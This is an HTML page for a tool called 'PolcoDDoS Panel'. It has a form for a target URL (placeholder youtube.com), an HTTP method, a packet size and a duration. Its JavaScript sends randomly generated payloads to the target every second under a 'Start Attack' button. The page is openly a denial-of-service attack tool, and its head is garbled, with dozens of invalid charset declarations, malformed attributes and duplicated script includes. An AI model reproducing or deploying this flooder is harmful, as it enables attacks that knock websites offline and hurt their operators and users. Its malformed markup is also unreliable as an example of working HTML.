    <!DOCTYPE html>

    <html>

    <head>

    <title>PolcoDDoS</title>

    <meta charset="UTF-8">
    <meta charset="UTF-16">
    <meta charset="UTF-16BE>
    <meta charset="UTF-16LE>
    <meta charset="UTF-32">
    <meta charset="UTF-32BE">
    <meta charset="UTF-32LE">
    <meta charset="Arabic (ISO-8859-6)">
    <meta charset="Arabic (windows-1256)">
    <meta charset="Baltic (ISO-8859-4)">
    <meta charset="Baltic (ISO-8859-13)">
    <meta charset="Baltic (windows-1257)">
    <meta charset="Celtic (ISO-8859-14)">
    <meta charset="Cyrillic (IBM866)">
    <meta charset="Cyrillic (KOI8-U)">
    <meta charset="Cyrillic (windows-1251)">
    <meta charset="Central European (windows-1250)">
    <meta charset="Eastern European (ISO-8859-2)">
    <meta charset="Greek (ISO-8859-2)">
    <meta charset="Greek (windows-1253)">
    <meta charset="Hebrew (ISO-8859-8)">
    <meta charset="Hebrew (windows-1258)">
    <meta charset="Japonese (EUC-JP)">
    <meta charset="Japonese (ISO-2022-JP)">
    <meta charset="Japonese (Shift-JIS)">
    <meta charset="Korean (EUC-KR)">
    <meta charset="Korean (ISO-2022-KR)"">
    <meta charset="Simplified Chinese (GV18030)">
    <meta charset="Simplified Chinese (GBK)">
    <meta charset="Simplified Chinese (ISO-2022-CN)">
    <meta charset="Thai (TIS-620)">
    <meta charset="Traditional Chinese (Big5)">
    <meta charset="Traditional Chinese (Big5-HKSCS)">
    <meta charset="Turkish (ISO-8859-3)">
    <meta charset="Turkish (ISO-8859-9)">
    <meta charset="Turkish (windows-1254)">
    <meta charset="Vietnamese (wimdows-1258)">
    <meta charset="Western European (ISO-8859-1)">
    <meta charset="Western European (ISO-8859-15)">
    <meta charset="Western European (windows-1252)">  
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">

    <link rel="stylesheet" href="https://releases.jquery.com/git/mobile/git/jquery.mobile-git.css">

    <link rel="stylesheet" href="https://code.jquery.com/qunit/qunit-2.24.3.css">
   
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.4/dist/jquery.slim.min.js"> </script>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6/dist/jquery.min.js"> </script>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"> </script>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.4/src/core.min.js"> </script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"> </script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"> </script>

    <script src="https://esm.run/d3@7.8.3"> </script>
    <script src="https://esm.run/d3@7.8"> </script>
    <script src="https://esm.run/d3@7"> </script>

    <script src="https://cdn.jsdelivr.net/gh/jquery/jquery@3.6.4/dist/jquery.min.js"> </script>
    <script src="https://cdn.jsdelivr.net/gh/jquery/jquery@3.6/dist/jquery.min.js"> </script>
    <script src="https://cdn.jsdelivr.net/gh/jquery/jquery@3/dist/jquery.min.js"> </script>
    <script src="https://cdn.jsdelivr.net/gh/jquery/jquery@3.6.4/src/core.min.js"> </script>

    <script src="https://cdn.jsdelivr.net/wp/plugins/wp-slimstat/tags/4.6.5/wp-slimstat.js"> </script>
    <script src="https://cdn.jsdelivr.net/wp/themes/twenty-eightteen/1.7/assets/js/html5.js"> </script>
   
    <script src="https://releases.jquery.com/git/mobile/git/jquery.mobile-git.j"s></script>

    <script src="https://code.jquery.com/qunit/qunit-2.24.3.js"></script>

    <style>

        .progress-bar::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            width: 2px;
            background-color: rgba(255, 255, 255, 0.75);
        }

    </style>

</head>

<body class="bg-dark" style="overflow: hidden;">
<div class="container mt-5">
    <div class="row">
        <div class="col-md-12">
            <div class="card border-primary">
                <div class="card-header bg-primary text-light">
                    PolcoDDoS Panel
                </div>

                <div class="card-body">
                    Target:
                    <input type="text" class="form-control" id="target" placeholder="https://www.youtube.com/" /><br />

                    <div class="row">
                        <div class="col-6">
                            Method:
                            <select id="method" class="form-control">
                                <option value="HEAD">HEAD</option>
                                <option value="DIALOG">DIALOG</option>
                                <option value="GET">GET</option>
                                <option value="POST">POST</option>
                                <option value="PUT">PUT</option>
                                <option value="OPTION">OPTION</option>
                                <option value="TRACE">TRACE</option>
                                <option value="PATCH">PATCH</option>
                                <option value="CONNECT">CONNECT</option>
                                <option value="DELETE">DELETE</option>
                            </select>
                        </div>

                        <div class="col-6">
                            Packet size (MB):
                            <input type="number" value="1" class="form-control" id="size" />
                        </div>
                    </div><br />

                    Duration (in seconds):
                    <input type="number" value="10" class="form-control" id="duration" /><br />

                    <button class="btn btn-success btn-block" id="attack">
                        Start Attack
                    </button>
                </div>
            </div>
        </div>
    </div>
</div>

<div class="progress" style="height: 30px; display: none;">
    <div id="progressBar" class="progress-bar bg-success" role="progressbar" style="width: 0%;" aria-valuenow="0"
         aria-valuemin="0" aria-valuemax="100"></div>
</div>

    <script>

    var DDOS_ATTACK = null;

    function generateRandomPayload(sizeInMB) {
        const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
        const dataSize = sizeInMB * 1024 * 1024;

        let payload = '';
        for (let i = 0; i < dataSize; i++) {
            payload += characters.charAt(Math.floor(Math.random() * characters.length));
        }

        return payload;
    }

    function attack(target, method = "HEAD", sizeInMB = 1, duration = 10) {
        if (DDOS_ATTACK == null) {
            $(".progress").show();

            var startTime = Date.now();
            var endTime = startTime + duration * 1000;
            var progress = 0;

            DDOS_ATTACK = setInterval(function () {
                if (Date.now() > endTime) {
                    clearInterval(DDOS_ATTACK);
                    DDOS_ATTACK = null;
                    $(".progress").hide();
                    $("#progressBar").css("width", "0%");
                    $("#attack").removeClass("btn-danger").addClass("btn-success").text("Start Attack");
                    return;
                }

                var version = "";
                var payload = generateRandomPayload(sizeInMB);

                var x = new XMLHttpRequest();
                x.open(method, target, true);
                x.send(payload);

                progress = ((Date.now() - startTime) / (endTime - startTime)) * 100;
                $("#progressBar").css("width", progress + "%");
                $("#progressBar").attr("aria-valuenow", progress);
            }, 1000);
        } else {
            clearInterval(DDOS_ATTACK);
            DDOS_ATTACK = null;
            $(".progress").hide();
            $("#progressBar").css("width", "0%");
            $("#attack").removeClass("btn-danger").addClass("btn-success").text("Start Attack");
        }
    }

    $("#attack").on("click", function () {
        var target = $("#target").val();
        var method = $("#method").val();
        var sizeInMB = $("#size").val();
        var duration = $("#duration").val();

        if (target.length < 1) {
            alert("Please enter target");
            return;
        }

        if ($(this).hasClass("btn-success")) {
            $(this).removeClass("btn-success").addClass("btn-danger").text("Stop Attack");
            attack(target, method, sizeInMB, duration);
        } else {
            $(this).removeClass("btn-danger").addClass("btn-success").text("Start Attack");
            clearInterval(DDOS_ATTACK);
            DDOS_ATTACK = null;
            $(".progress").hide();
            $("#progressBar").css("width", "0%");
        }
    });

</script>

    <script>
	
javascript:(function(){var b=document.getElementsByTagName('meta'),c=b.length,a;while(c--){a=b[c];if(a.name.toLowerCase()=='viewport'){a.parentNode.removeChild(a)}}})();

</script>

    <script>
	
	(function() {
    var metaElements = document.getElementsByTagName('meta'),
        i            = metaElements.length,
        el;
    
    while (i--) {
        el = metaElements[i];
        if (el.name.toLowerCase() == 'viewport') {
            el.parentNode.removeChild(el);
        }
    }
})();

</script>

</body>

</html>